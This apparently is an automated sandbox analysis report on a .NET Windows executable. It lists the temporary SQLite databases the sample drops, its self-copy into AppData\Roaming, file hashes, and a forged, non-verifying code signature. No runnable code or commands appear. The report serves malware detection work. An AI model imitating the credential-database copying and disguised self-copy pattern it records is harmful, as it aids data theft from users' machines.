                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD070.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD081.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD082.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD093.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpDFF0.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                    C:\Users\user\AppData\Local\Temp\tmpDFF1.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                    C:\Users\user\AppData\Local\Temp\tmpE002.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                    C:\Users\user\AppData\Local\Temp\tmpF593.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF5A4.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF5D4.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF5F4.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpFAE9.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpFAF9.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\LjGABleGAy.exe

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):563720
                    Entropy (8bit):7.918041515283847
                    Encrypted:false
                    SSDEEP:12288:1Y5Q6QFm4SY+aZrwrLVRqRNlom98NGykPI7MqXb39bNjgJaXukR:u4/4rLVRqhoKIGNIgqxRiO1
                    MD5:304EA6D5CF3786D19DE14F004D7D057A
                    SHA1:D86DDB3BECC0A82C915BE35E7A7DCD796B50C269
                    SHA-256:89DD158D0FFDB6D661672343D36F5A87907E1CC60A0E9E85C892F75228EB399B
                    SHA-512:4C0731A52E57E429D1001DA518066C073CEB0C9C91992E66DC674C3DFC352156E48DC22DC5482310D2C0CE38A2E87AACE2DCFA7A9E6915D1BDE3EEE7BC8D3C08
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 83%
                    • Antivirus: Virustotal, Detection: 43%, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...LT.f..............0..D...........b... ........@.. ....................................@.................................@b..O....................d...6........................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............b..............@..B................tb......H.......@z...P......?...(...............................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0...........s.....s.....s..........(....s......s....}.....s....}.....{....o .....{....o .....(!.....{.....o".....{.....o#.....{.....o$.....{.....o%.....{......s&...o'.....{........s(...o).....{....r...po*.....{.... .... I...s+...o,.....{.....o-.....r...po......{....o/....o0.....r1..po......{....o1....o2.....{..... ..s&...o'..

                    C:\Users\user\AppData\Roaming\LjGABleGAy.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.918041515283847
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    • Win32 Executable (generic) a (10002005/4) 49.97%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:RgIbrhxoEx.exe
                    File size:563'720 bytes
                    MD5:304ea6d5cf3786d19de14f004d7d057a
                    SHA1:d86ddb3becc0a82c915be35e7a7dcd796b50c269
                    SHA256:89dd158d0ffdb6d661672343d36f5a87907e1cc60a0e9e85c892f75228eb399b
                    SHA512:4c0731a52e57e429d1001da518066c073ceb0c9c91992e66dc674c3dfc352156e48dc22dc5482310d2c0ce38a2e87aace2dcfa7a9e6915d1bde3eee7bc8d3c08
                    SSDEEP:12288:1Y5Q6QFm4SY+aZrwrLVRqRNlom98NGykPI7MqXb39bNjgJaXukR:u4/4rLVRqhoKIGNIgqxRiO1
                    TLSH:4CC4238247B89F06CC766FF565618451CFB3BA3E9612C78E0ED250CD2AD2B806312E5F
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...LT.f..............0..D...........b... ........@.. ....................................@................................

                    File Icon

                    Icon Hash:3570b480858580c5

                    Static PE Info

                    General

                    Entrypoint:0x486292
                    Entrypoint Section:.text
                    Digitally signed:true
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A0544C [Wed Jul 24 01:09:32 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Authenticode Signature

                    Signature Valid:false
                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                    Signature Validation Error:The digital signature of the object did not verify
                    Error Number:-2146869232
                    Not Before, Not After
                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                    Subject Chain
                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                    Version:3
                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                    Serial:7C1118CBBADC95DA3752C46E47A27438

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x862400x4f.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x1a90.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x864000x3608
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
